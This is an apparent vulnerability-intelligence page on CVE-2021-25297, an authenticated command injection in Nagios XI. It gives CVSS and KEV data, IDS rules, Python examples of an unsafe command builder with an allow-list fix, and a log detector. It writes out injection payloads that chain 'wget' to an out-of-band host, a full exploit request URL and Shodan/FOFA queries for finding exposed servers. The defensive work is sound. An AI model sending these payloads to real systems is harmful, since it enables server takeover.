CVE-2021-25297
Published: 2021-02-15
Priority: P189 · Severity: high · CVSS 3.1: 8.8
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, remediation due 2022-02-01
Exploited in the wild
EPSS: 42.94% (98.6th percentile)
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.
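The description names the pattern (CWE-78: a user-controlled ip_address field reaching an OS command in switch.inc.php) but the page does not show the code. The block below is an added example in Python, not the vendor's PHP: a hypothetical unsafe builder with the same shape beside an allow-list fix. build_ping_unsafe, parse_target_host, build_ping_safe and the PAYLOAD string are constructed for illustration; that the wizard runs a ping-style command against the field is an assumption taken from the 'Ping' string the Nuclei template checks for in the response.

```python
"""CWE-78 pattern behind CVE-2021-25297 and an allow-list fix.

Added example in Python, hypothetical: it is not the PHP in switch.inc.php.
The page only says the wizard's ip_address input reaches an OS command and
that the response contains 'Ping', so a ping-style command is assumed.
"""
import ipaddress
import re
import subprocess

# RFC 1123 hostname: labels of 1-63 alphanumerics/hyphens, no leading/trailing hyphen.
HOST_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME = re.compile(rf"{HOST_LABEL}(?:\.{HOST_LABEL})*\.?")

# Constructed payload mirroring the PoC shape: close the quote, chain a command.
PAYLOAD = '127.0.0.1"; wget http://oob.example; "'


def build_ping_unsafe(ip_address):
    """Vulnerable shape: the field is interpolated into a shell command line.
    With PAYLOAD the shell sees  ping -c 1 "127.0.0.1"; wget http://oob.example; ""
    and runs wget as the web-server user (apache on Nagios XI)."""
    return f'ping -c 1 "{ip_address}"'


def parse_target_host(value):
    """Allow-list validation: a literal IPv4/IPv6 address or an RFC 1123
    hostname. Anything else raises; nothing is stripped or escaped, because
    a metacharacter denylist is the fragile approach."""
    value = value.strip()
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if 0 < len(value) <= 253 and HOSTNAME.fullmatch(value):
        return value
    raise ValueError(f"not an IP address or hostname: {value!r}")


def accepts(value):
    """True when the allow-list accepts the value."""
    try:
        parse_target_host(value)
        return True
    except ValueError:
        return False


def build_ping_safe(ip_address):
    """Hardened shape: validate, then return an argv list. Executed with
    shell=False there is no shell to interpret ';', '|', '$(...)' or quotes,
    and the allow-list rules out a leading '-' that ping could read as an option."""
    return ["ping", "-c", "1", parse_target_host(ip_address)]


def ping_host(ip_address, timeout=5):
    """Run the hardened command (not exercised here; ping may be absent)."""
    return subprocess.run(build_ping_safe(ip_address), capture_output=True,
                          text=True, timeout=timeout, check=False)


def demo(value=PAYLOAD):
    """Return what the unsafe builder would hand to a shell and whether the
    hardened builder accepts the same input."""
    return build_ping_unsafe(value), accepts(value)


if __name__ == "__main__":
    cmdline, ok = demo()
    print("unsafe command line:", cmdline)
    print("hardened builder accepted payload:", ok)
```

The point of the allow-list over escaping: escapeshellarg-style quoting has to be applied at every call site and only protects the argument boundary, whereas rejecting anything that is not an address or hostname at the input edge makes the argv list safe regardless of how the command is later assembled.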
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nagios | nagios_xi | 5.5.6 – 5.7.5 | — |
Detection & IOCs (extracted from sources)
- url: /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on
- path: /nagiosxi/config/monitoringwizard.php
- snort (ET sid 2034993, rev 1): alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"ip_address="; content:"|3b|"; within:30; reference:cve,2021-25296; reference:cve,2021-25297; classtype:attempted-admin; sid:2034993; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296_CVE_2021_25297, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- Exploit traffic is a GET request to /nagiosxi/config/monitoringwizard.php whose 'ip_address' parameter contains a semicolon (URL-encoded as %3b, byte 0x3b) that terminates the IP address value and starts the injected command.
- The Nuclei template confirms exploitation by checking for an out-of-band DNS interaction (interactsh) together with a 200 response whose body contains both 'Ping' and 'Switch Details'.
- The injection request sets wizard=switch and nextstep=3; defenders should alert on those query-string values combined with shell metacharacters in ip_address.
- Shodan/FOFA queries that identify exposed Nagios XI instances as potential targets: title:"Nagios XI", http.title:"nagios xi", title="nagios xi", app="nagios-xi".
- Successful exploitation yields command execution as the 'apache' user on the Nagios XI server.
- The vulnerability affects Nagios XI versions 5.5.6 through 5.7.5; versions outside this range are not affected by this specific injection path.
- Exploitation requires valid Nagios XI credentials; this is an authenticated vulnerability, not an unauthenticated one.
- The Metasploit module also covers CVE-2021-25296 (windowswmi wizard) and CVE-2021-25298 (cloud-vm wizard) from the same module. The Snort/Suricata rule SID 2034993 names CVE-2021-25297 and CVE-2021-25298 in its msg field but cites CVE-2021-25296 and CVE-2021-25297 in its reference fields; because it keys on the monitoringwizard.php URI and the ip_address parameter rather than on the wizard value, it does not distinguish between the three.
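The detection points listed above (the monitoringwizard.php path, the ip_address parameter, the 0x3b within 30 bytes that sid 2034993 keys on, and the wizard values) can be checked against the web server's own access log as well as on the wire. The block below is an added example, not code from the page, Nagios or Emerging Threats: it approximates the ET rule's match on the normalized URI and then applies a broader metacharacter check on the decoded parameter, which the rule's literal semicolon match would miss. The four access-log lines, the TOKEN value standing in for the nsp parameter and the oob.example host are constructed; treating windowswmi and cloud-vm as taking the same ip_address field as the switch wizard is an assumption made for the wizard allow-list.

```python
"""Log-side detector for the Nagios XI monitoring-wizard command injection
(CVE-2021-25297 and the sibling wizards CVE-2021-25296/-25298).

Added example, not code from the page, Nagios or Emerging Threats.
Sample log lines, the TOKEN nsp value and the host oob.example are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined"/"common" format; only client, request line and status are used.
ACCESS_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

WIZARD_PATH = "/nagiosxi/config/monitoringwizard.php"
# Assumption for the allow-list: windowswmi and cloud-vm take the same
# ip_address field as the switch wizard.
VULN_WIZARDS = {"switch", "windowswmi", "cloud-vm"}
# sh(1) command separators and substitution. ET sid 2034993 only looks for ';'.
SHELL_META = re.compile(r"[;&|`$\n\r]")

SAMPLE_LOG = [
    # Constructed: the Nuclei/ET payload shape against the switch wizard.
    '198.51.100.7 - - [18/Jan/2022:10:01:22 +0000] "GET /nagiosxi/config/monitoringwizard.php'
    '?update=1&nsp=TOKEN&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20oob.example%3b'
    '&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1" 200 5120',
    # Constructed: same idea chained with '|' instead of ';', which the ET rule does not match.
    '198.51.100.7 - - [18/Jan/2022:10:01:25 +0000] "GET /nagiosxi/config/monitoringwizard.php'
    '?update=1&nsp=TOKEN&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%7c%20id%20%23 HTTP/1.1" 200 4880',
    # Constructed: legitimate wizard use with a plain address; no alert expected.
    '10.0.0.5 - admin [18/Jan/2022:10:02:00 +0000] "GET /nagiosxi/config/monitoringwizard.php'
    '?update=1&nsp=TOKEN&nextstep=3&wizard=switch&ip_address=10.0.0.9&scaninterfaces=on HTTP/1.1" 200 5120',
    # Constructed: unrelated page.
    '10.0.0.5 - admin [18/Jan/2022:10:02:30 +0000] "GET /nagiosxi/index.php HTTP/1.1" 200 900',
]


def parse_access_line(line):
    """Split one access-log line into its fields, or None if it does not parse."""
    m = ACCESS_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def wizard_params(target):
    """Return (path, decoded query dict with first value per key) for a request target."""
    parts = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return parts.path, query


def snort_style_match(method, target):
    """Approximation of ET sid 2034993: GET, URI containing the wizard path followed
    by '?', then 'ip_address=' with a ';' inside the next 30 bytes. The rule matches
    on the normalized http.uri buffer, so the URI is percent-decoded first."""
    if method != "GET":
        return False
    uri = unquote(target)
    if WIZARD_PATH + "?" not in uri:
        return False
    i = uri.find("ip_address=")
    if i < 0:
        return False
    start = i + len("ip_address=")
    return ";" in uri[start:start + 30]


def classify(line):
    """Describe why (or whether) a line looks like wizard command injection.
    'snort' mirrors the ET rule; 'decoded' is the broader check on the actual
    parameter value for the vulnerable wizards."""
    rec = parse_access_line(line)
    if rec is None:
        return None
    path, q = wizard_params(rec["target"])
    verdict = {
        "src": rec["src"],
        "wizard": q.get("wizard"),
        "snort": snort_style_match(rec["method"], rec["target"]),
        "decoded": False,
    }
    if path == WIZARD_PATH and q.get("wizard") in VULN_WIZARDS:
        verdict["decoded"] = bool(SHELL_META.search(q.get("ip_address", "")))
    verdict["alert"] = verdict["snort"] or verdict["decoded"]
    return verdict


def scan(lines):
    """Return the verdicts that should raise an alert."""
    return [v for v in map(classify, lines) if v and v["alert"]]


if __name__ == "__main__":
    for v in scan(SAMPLE_LOG):
        print(v)
```

Run over the sample, the first line trips both checks, the second (pipe instead of semicolon) trips only the decoded check, and the legitimate wizard call and the unrelated page trip neither. Since the ET rule only looks for a semicolon, the decoded check is the one to lean on in a SIEM where the parameter is already available as text.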
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |
| vulncheck | — | 8.8 | HIGH | — |
| cisa | — | 8.8 | HIGH | — |
GHSA
GHSA-5924-w244-8fxp: Nagios XI version xi-5
ghsa_unreviewed · 2022-05-24 · CVE-2021-25297 [HIGH] · CWE-78
Description identical to the NVD text above.
VulnCheck
Nagios XI OS Command Injection
vulncheck · 2021 · CVE-2021-25297 [HIGH] · CWE-78 · CVSS 8.8
Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.
Affected: Nagios Nagios XI
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-february-april-2021/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2022-02-01
CISA
Nagios XI OS Command Injection
cisa · 2022-01-18 · CVE-2021-25297 [HIGH] · CWE-78 · CVSS 8.8
Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.
Affected: Nagios Nagios XI
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-25297
Remediation Due Date: 2022-02-01
Suricata
ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
suricata · 2025-01-09 · CVE-2021-25299 [MEDIUM] · CVSS 6.1
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/nagiosxi/admin/sshterm.php?"; startswith; fast_pattern; content:"url="; nocase; pcre:"/^.+(script|onerror|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D)/Ri"; reference:url,www.connectwise.com/resources/cve-spotlight-nagios-xi-cve-2021-25296-25297-25298-25299; reference:cve,2021-25299; classtype:web-application-attack; sid:2059094; rev:2; metadata:affected_product
Suricata
ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
suricata · 2022-01-27 · CVE-2021-25296 [HIGH] · CVSS 8.8
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"ip_address="; content:"|3b|"; within:30; reference:cve,2021-25296; reference:cve,2021-25297; classtype:attempted-admin; sid:2034993; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296_CVE_2021_25297, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Nuclei
Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection
nuclei · CVE-2021-25297 [HIGH] · CVSS 8.8
Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
```yaml
id: CVE-2021-25297
info:
  name: Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection
  author: k0pak4
  severity: high
  description: |
    Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is im
```
Metasploit
Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Execution
metasploit · CVE-2021-25296 [HIGH] · CVSS 8.8
This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm configuration wizards that allow an authenticated user to perform remote code execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user. Valid credentials for a Nagios XI user are required. This module has been successfully tested against official Nagios XI OVAs from 5.5.6 to 5.7.5.
Unit42
Network Attack Trends: February-April 2021
blogs_unit42 · Yue Guan, Lei Xu, Vaibhav Singhal, Brock Mammen · published July 1, 2021 (Threat Research Center, Trend Reports, Vulnerabilities)
## Executive Summary
Unit 42 researchers observed network attack trends, February-April 2021. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity and category. Additionally, we provide insight into how the vulnerabilities are actively exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls. We then draw conclusions about the most commonly exploited vulnerabilities the attackers are using, as well as the severity, category and origin of each attack.
## Network Attack Trends February-April 2021: Analysis of the Latest Published Vulnerabilities
From February-April 2021, a total of 4,969 new Common Vulnerabilities and Exposures (CVE) numbers were registered. To better und
References
- http://nagios.com
- http://packetstormsecurity.com/files/161561/Nagios-XI-5.7.5-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html
- https://assets.nagios.com/downloads/nagiosxi/versions.php
- https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md
- https://www.fastly.com/blog/anatomy-of-a-command-injection-cve-2021-25296-7-8-with-metasploit-module-and
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-25297
Timeline
- 2021-02-15: Published
- 2022-01-18: Added to CISA KEV
- Exploited in the wild